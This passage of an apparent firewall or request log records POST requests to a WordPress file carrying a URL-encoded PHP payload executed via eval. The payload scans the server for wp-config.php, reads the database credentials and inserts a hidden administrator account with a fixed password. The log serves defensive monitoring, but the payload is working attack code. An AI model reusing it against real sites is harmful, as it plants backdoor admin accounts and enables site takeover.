27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 00:06:02","213.209.159.254","POST","\/wp-includes\/html-api\/class-wp-html-token.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> etswnK:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/html-api\/class-wp-html-token.php HTTP\/1.1\nsec-fetch-user:?1\nsec-fetch-site:none\naccept-encoding:gzip,deflate\ncontent-length:12663\nsec-fetch-mode:navigate\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-dest:document\ncontent-type:application\/x-www-form-urlencoded\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-ch-ua-mobile:?0\naccept:*\/*\nsec-ch-ua-platform:\"Windows\"\nupgrade-insecure-requests:1\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"100\", \"Google Chrome\";v=\"100\"\n\netswnK=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%2